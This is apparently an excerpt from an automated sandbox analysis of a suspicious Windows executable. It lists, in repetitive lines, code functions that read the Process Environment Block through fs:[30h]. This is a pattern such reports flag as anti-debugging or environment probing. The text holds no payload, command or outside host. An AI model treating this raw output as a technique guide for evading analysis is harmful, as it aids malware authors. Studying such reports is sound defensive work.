Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73B931 mov eax, dword ptr fs:[00000030h] 7_2_1D73B931
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73B931 mov eax, dword ptr fs:[00000030h] 7_2_1D73B931
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7D5930 mov eax, dword ptr fs:[00000030h] 7_2_1D7D5930
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7D5930 mov eax, dword ptr fs:[00000030h] 7_2_1D7D5930
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7D5930 mov eax, dword ptr fs:[00000030h] 7_2_1D7D5930
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7D5930 mov ecx, dword ptr fs:[00000030h] 7_2_1D7D5930
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D769938 mov ecx, dword ptr fs:[00000030h] 7_2_1D769938
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D775921 mov eax, dword ptr fs:[00000030h] 7_2_1D775921
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D775921 mov ecx, dword ptr fs:[00000030h] 7_2_1D775921
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D775921 mov eax, dword ptr fs:[00000030h] 7_2_1D775921
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D775921 mov eax, dword ptr fs:[00000030h] 7_2_1D775921
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D737917 mov eax, dword ptr fs:[00000030h] 7_2_1D737917
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7399F0 mov ecx, dword ptr fs:[00000030h] 7_2_1D7399F0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76B9FA mov eax, dword ptr fs:[00000030h] 7_2_1D76B9FA
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7E99D6 mov ecx, dword ptr fs:[00000030h] 7_2_1D7E99D6
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74B9C0 mov eax, dword ptr fs:[00000030h] 7_2_1D74B9C0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74B9C0 mov eax, dword ptr fs:[00000030h] 7_2_1D74B9C0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76D9CE mov eax, dword ptr fs:[00000030h] 7_2_1D76D9CE
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FD9C6 mov eax, dword ptr fs:[00000030h] 7_2_1D7FD9C6
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7CD9C7 mov eax, dword ptr fs:[00000030h] 7_2_1D7CD9C7
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73B9B0 mov eax, dword ptr fs:[00000030h] 7_2_1D73B9B0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D80D946 mov eax, dword ptr fs:[00000030h] 7_2_1D80D946
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7CF9AA mov eax, dword ptr fs:[00000030h] 7_2_1D7CF9AA
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7CF9AA mov eax, dword ptr fs:[00000030h] 7_2_1D7CF9AA
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74F870 mov eax, dword ptr fs:[00000030h] 7_2_1D74F870
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74F870 mov eax, dword ptr fs:[00000030h] 7_2_1D74F870
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D759870 mov eax, dword ptr fs:[00000030h] 7_2_1D759870
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D759870 mov eax, dword ptr fs:[00000030h] 7_2_1D759870
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7CF85C mov eax, dword ptr fs:[00000030h] 7_2_1D7CF85C
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7CF85C mov eax, dword ptr fs:[00000030h] 7_2_1D7CF85C
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7CF85C mov eax, dword ptr fs:[00000030h] 7_2_1D7CF85C
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EF85F mov eax, dword ptr fs:[00000030h] 7_2_1D7EF85F
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EF85F mov eax, dword ptr fs:[00000030h] 7_2_1D7EF85F
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EF85F mov eax, dword ptr fs:[00000030h] 7_2_1D7EF85F
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76B839 mov eax, dword ptr fs:[00000030h] 7_2_1D76B839
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FF82B mov eax, dword ptr fs:[00000030h] 7_2_1D7FF82B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FF82B mov eax, dword ptr fs:[00000030h] 7_2_1D7FF82B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FF82B mov eax, dword ptr fs:[00000030h] 7_2_1D7FF82B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FF82B mov eax, dword ptr fs:[00000030h] 7_2_1D7FF82B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FF82B mov eax, dword ptr fs:[00000030h] 7_2_1D7FF82B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FF82B mov eax, dword ptr fs:[00000030h] 7_2_1D7FF82B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FF82B mov eax, dword ptr fs:[00000030h] 7_2_1D7FF82B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FF82B mov eax, dword ptr fs:[00000030h] 7_2_1D7FF82B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FF82B mov eax, dword ptr fs:[00000030h] 7_2_1D7FF82B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FF82B mov eax, dword ptr fs:[00000030h] 7_2_1D7FF82B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FF82B mov eax, dword ptr fs:[00000030h] 7_2_1D7FF82B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FF82B mov eax, dword ptr fs:[00000030h] 7_2_1D7FF82B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FF82B mov eax, dword ptr fs:[00000030h] 7_2_1D7FF82B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FF82B mov eax, dword ptr fs:[00000030h] 7_2_1D7FF82B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D8018DA mov eax, dword ptr fs:[00000030h] 7_2_1D8018DA
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D8018DA mov eax, dword ptr fs:[00000030h] 7_2_1D8018DA
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D8018DA mov eax, dword ptr fs:[00000030h] 7_2_1D8018DA
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D8018DA mov eax, dword ptr fs:[00000030h] 7_2_1D8018DA
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73D818 mov eax, dword ptr fs:[00000030h] 7_2_1D73D818
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73D800 mov eax, dword ptr fs:[00000030h] 7_2_1D73D800
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753800 mov eax, dword ptr fs:[00000030h] 7_2_1D753800
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753800 mov eax, dword ptr fs:[00000030h] 7_2_1D753800
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753800 mov eax, dword ptr fs:[00000030h] 7_2_1D753800
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EF8F8 mov eax, dword ptr fs:[00000030h] 7_2_1D7EF8F8
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EF8F8 mov eax, dword ptr fs:[00000030h] 7_2_1D7EF8F8
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EF8F8 mov eax, dword ptr fs:[00000030h] 7_2_1D7EF8F8
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EF8F8 mov eax, dword ptr fs:[00000030h] 7_2_1D7EF8F8
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EF8F8 mov eax, dword ptr fs:[00000030h] 7_2_1D7EF8F8
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76D8F0 mov eax, dword ptr fs:[00000030h] 7_2_1D76D8F0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76D8F0 mov eax, dword ptr fs:[00000030h] 7_2_1D76D8F0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76D8F0 mov esi, dword ptr fs:[00000030h] 7_2_1D76D8F0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76D8F0 mov eax, dword ptr fs:[00000030h] 7_2_1D76D8F0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76D8F0 mov eax, dword ptr fs:[00000030h] 7_2_1D76D8F0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76D8F0 mov eax, dword ptr fs:[00000030h] 7_2_1D76D8F0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76D8F0 mov eax, dword ptr fs:[00000030h] 7_2_1D76D8F0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76D8F0 mov eax, dword ptr fs:[00000030h] 7_2_1D76D8F0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7378E1 mov eax, dword ptr fs:[00000030h] 7_2_1D7378E1
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7458E0 mov eax, dword ptr fs:[00000030h] 7_2_1D7458E0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7458E0 mov eax, dword ptr fs:[00000030h] 7_2_1D7458E0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7458E0 mov eax, dword ptr fs:[00000030h] 7_2_1D7458E0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7458E0 mov eax, dword ptr fs:[00000030h] 7_2_1D7458E0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7498DE mov eax, dword ptr fs:[00000030h] 7_2_1D7498DE
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73F8B0 mov eax, dword ptr fs:[00000030h] 7_2_1D73F8B0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73F8B0 mov eax, dword ptr fs:[00000030h] 7_2_1D73F8B0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73F8B0 mov eax, dword ptr fs:[00000030h] 7_2_1D73F8B0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73F8B0 mov eax, dword ptr fs:[00000030h] 7_2_1D73F8B0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73F8B0 mov eax, dword ptr fs:[00000030h] 7_2_1D73F8B0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73F8B0 mov eax, dword ptr fs:[00000030h] 7_2_1D73F8B0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73F8B0 mov eax, dword ptr fs:[00000030h] 7_2_1D73F8B0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73F8B0 mov eax, dword ptr fs:[00000030h] 7_2_1D73F8B0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73F8B0 mov eax, dword ptr fs:[00000030h] 7_2_1D73F8B0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73F8B0 mov eax, dword ptr fs:[00000030h] 7_2_1D73F8B0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73F8B0 mov eax, dword ptr fs:[00000030h] 7_2_1D73F8B0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7C98B2 mov eax, dword ptr fs:[00000030h] 7_2_1D7C98B2
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D77B890 mov eax, dword ptr fs:[00000030h] 7_2_1D77B890
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D77B890 mov eax, dword ptr fs:[00000030h] 7_2_1D77B890
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D77B890 mov eax, dword ptr fs:[00000030h] 7_2_1D77B890
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76D898 mov eax, dword ptr fs:[00000030h] 7_2_1D76D898
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D767882 mov eax, dword ptr fs:[00000030h] 7_2_1D767882
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7E1889 mov eax, dword ptr fs:[00000030h] 7_2_1D7E1889
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7E1889 mov eax, dword ptr fs:[00000030h] 7_2_1D7E1889
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7E1889 mov eax, dword ptr fs:[00000030h] 7_2_1D7E1889
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D77188E mov eax, dword ptr fs:[00000030h] 7_2_1D77188E
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D77188E mov eax, dword ptr fs:[00000030h] 7_2_1D77188E
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D737B7D mov eax, dword ptr fs:[00000030h] 7_2_1D737B7D
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D737B7D mov ecx, dword ptr fs:[00000030h] 7_2_1D737B7D
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D77BB5B mov esi, dword ptr fs:[00000030h] 7_2_1D77BB5B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7CFB45 mov eax, dword ptr fs:[00000030h] 7_2_1D7CFB45
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FBB40 mov ecx, dword ptr fs:[00000030h] 7_2_1D7FBB40
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FBB40 mov eax, dword ptr fs:[00000030h] 7_2_1D7FBB40
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7CDB2A mov eax, dword ptr fs:[00000030h] 7_2_1D7CDB2A
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7CDB1B mov eax, dword ptr fs:[00000030h] 7_2_1D7CDB1B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D781B0F mov eax, dword ptr fs:[00000030h] 7_2_1D781B0F
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D781B0F mov eax, dword ptr fs:[00000030h] 7_2_1D781B0F
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D737BF0 mov eax, dword ptr fs:[00000030h] 7_2_1D737BF0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D737BF0 mov ecx, dword ptr fs:[00000030h] 7_2_1D737BF0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D737BF0 mov eax, dword ptr fs:[00000030h] 7_2_1D737BF0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D737BF0 mov eax, dword ptr fs:[00000030h] 7_2_1D737BF0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D751BE7 mov eax, dword ptr fs:[00000030h] 7_2_1D751BE7
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D751BE7 mov eax, dword ptr fs:[00000030h] 7_2_1D751BE7
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D775BE0 mov eax, dword ptr fs:[00000030h] 7_2_1D775BE0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D775BE0 mov eax, dword ptr fs:[00000030h] 7_2_1D775BE0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76FBC0 mov ecx, dword ptr fs:[00000030h] 7_2_1D76FBC0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76FBC0 mov eax, dword ptr fs:[00000030h] 7_2_1D76FBC0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76FBC0 mov eax, dword ptr fs:[00000030h] 7_2_1D76FBC0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76FBC0 mov eax, dword ptr fs:[00000030h] 7_2_1D76FBC0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76FBC0 mov eax, dword ptr fs:[00000030h] 7_2_1D76FBC0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D77BBC0 mov eax, dword ptr fs:[00000030h] 7_2_1D77BBC0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D77BBC0 mov eax, dword ptr fs:[00000030h] 7_2_1D77BBC0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D77BBC0 mov ecx, dword ptr fs:[00000030h] 7_2_1D77BBC0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D77BBC0 mov eax, dword ptr fs:[00000030h] 7_2_1D77BBC0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7BFBC2 mov eax, dword ptr fs:[00000030h] 7_2_1D7BFBC2
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7D5BC0 mov eax, dword ptr fs:[00000030h] 7_2_1D7D5BC0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D743BA4 mov eax, dword ptr fs:[00000030h] 7_2_1D743BA4
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D743BA4 mov eax, dword ptr fs:[00000030h] 7_2_1D743BA4
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D743BA4 mov eax, dword ptr fs:[00000030h] 7_2_1D743BA4
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D743BA4 mov eax, dword ptr fs:[00000030h] 7_2_1D743BA4
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D771B9C mov eax, dword ptr fs:[00000030h] 7_2_1D771B9C
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7CDB90 mov eax, dword ptr fs:[00000030h] 7_2_1D7CDB90
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7C1B93 mov eax, dword ptr fs:[00000030h] 7_2_1D7C1B93
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D751B80 mov eax, dword ptr fs:[00000030h] 7_2_1D751B80
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73FA44 mov ecx, dword ptr fs:[00000030h] 7_2_1D73FA44
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7CDA40 mov eax, dword ptr fs:[00000030h] 7_2_1D7CDA40
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D779A48 mov eax, dword ptr fs:[00000030h] 7_2_1D779A48
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D779A48 mov eax, dword ptr fs:[00000030h] 7_2_1D779A48
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D737A30 mov eax, dword ptr fs:[00000030h] 7_2_1D737A30
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D737A30 mov eax, dword ptr fs:[00000030h] 7_2_1D737A30
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D737A30 mov eax, dword ptr fs:[00000030h] 7_2_1D737A30
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7CDA31 mov eax, dword ptr fs:[00000030h] 7_2_1D7CDA31
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FDA30 mov eax, dword ptr fs:[00000030h] 7_2_1D7FDA30
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D741A24 mov eax, dword ptr fs:[00000030h] 7_2_1D741A24
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D741A24 mov eax, dword ptr fs:[00000030h] 7_2_1D741A24
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76DA20 mov eax, dword ptr fs:[00000030h] 7_2_1D76DA20
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76DA20 mov eax, dword ptr fs:[00000030h] 7_2_1D76DA20
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76DA20 mov eax, dword ptr fs:[00000030h] 7_2_1D76DA20
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76DA20 mov eax, dword ptr fs:[00000030h] 7_2_1D76DA20
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76DA20 mov eax, dword ptr fs:[00000030h] 7_2_1D76DA20
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76DA20 mov edx, dword ptr fs:[00000030h] 7_2_1D76DA20
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753AF6 mov eax, dword ptr fs:[00000030h] 7_2_1D753AF6
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753AF6 mov eax, dword ptr fs:[00000030h] 7_2_1D753AF6
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753AF6 mov eax, dword ptr fs:[00000030h] 7_2_1D753AF6
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753AF6 mov eax, dword ptr fs:[00000030h] 7_2_1D753AF6
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753AF6 mov eax, dword ptr fs:[00000030h] 7_2_1D753AF6
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D749AE4 mov eax, dword ptr fs:[00000030h] 7_2_1D749AE4
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73FAEC mov edi, dword ptr fs:[00000030h] 7_2_1D73FAEC
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76DAC0 mov eax, dword ptr fs:[00000030h] 7_2_1D76DAC0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76DAC0 mov eax, dword ptr fs:[00000030h] 7_2_1D76DAC0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76DAC0 mov eax, dword ptr fs:[00000030h] 7_2_1D76DAC0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76DAC0 mov eax, dword ptr fs:[00000030h] 7_2_1D76DAC0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76DAC0 mov eax, dword ptr fs:[00000030h] 7_2_1D76DAC0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76DAC0 mov eax, dword ptr fs:[00000030h] 7_2_1D76DAC0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7E7ABE mov eax, dword ptr fs:[00000030h] 7_2_1D7E7ABE
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D779ABF mov eax, dword ptr fs:[00000030h] 7_2_1D779ABF
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D779ABF mov eax, dword ptr fs:[00000030h] 7_2_1D779ABF
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D779ABF mov eax, dword ptr fs:[00000030h] 7_2_1D779ABF
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FDAAF mov eax, dword ptr fs:[00000030h] 7_2_1D7FDAAF
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D80BA66 mov eax, dword ptr fs:[00000030h] 7_2_1D80BA66
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D80BA66 mov eax, dword ptr fs:[00000030h] 7_2_1D80BA66
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D80BA66 mov eax, dword ptr fs:[00000030h] 7_2_1D80BA66
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D80BA66 mov eax, dword ptr fs:[00000030h] 7_2_1D80BA66
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73BA80 mov eax, dword ptr fs:[00000030h] 7_2_1D73BA80
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7C9567 mov eax, dword ptr fs:[00000030h] 7_2_1D7C9567
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D743536 mov eax, dword ptr fs:[00000030h] 7_2_1D743536
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D743536 mov eax, dword ptr fs:[00000030h] 7_2_1D743536
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73753F mov eax, dword ptr fs:[00000030h] 7_2_1D73753F
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73753F mov eax, dword ptr fs:[00000030h] 7_2_1D73753F
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73753F mov eax, dword ptr fs:[00000030h] 7_2_1D73753F
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D771527 mov eax, dword ptr fs:[00000030h] 7_2_1D771527
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D77F523 mov eax, dword ptr fs:[00000030h] 7_2_1D77F523
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D761514 mov eax, dword ptr fs:[00000030h] 7_2_1D761514
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D761514 mov eax, dword ptr fs:[00000030h] 7_2_1D761514
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D761514 mov eax, dword ptr fs:[00000030h] 7_2_1D761514
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D761514 mov eax, dword ptr fs:[00000030h] 7_2_1D761514
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D761514 mov eax, dword ptr fs:[00000030h] 7_2_1D761514
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D761514 mov eax, dword ptr fs:[00000030h] 7_2_1D761514
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EF51B mov eax, dword ptr fs:[00000030h] 7_2_1D7EF51B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EF51B mov eax, dword ptr fs:[00000030h] 7_2_1D7EF51B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EF51B mov eax, dword ptr fs:[00000030h] 7_2_1D7EF51B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EF51B mov eax, dword ptr fs:[00000030h] 7_2_1D7EF51B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EF51B mov eax, dword ptr fs:[00000030h] 7_2_1D7EF51B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EF51B mov eax, dword ptr fs:[00000030h] 7_2_1D7EF51B
